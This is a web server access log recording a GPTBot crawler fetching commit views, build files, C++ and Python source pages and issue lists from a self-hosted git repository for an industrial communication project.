"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11036] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14174] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11164] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11167] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:17:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:17:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11420] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11419] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11420] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11422] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" -[17/Feb/2026:17:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:17:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12059] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" -[17/Feb/2026:17:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10124] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:17:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" -[17/Feb/2026:17:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" -[17/Feb/2026:17:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/main.py?display=source" [Client 74.7.227.38] [Length 11777] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/main.py" -[17/Feb/2026:17:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19957] [Gzip 5.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" -[17/Feb/2026:17:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:17:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:17:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr 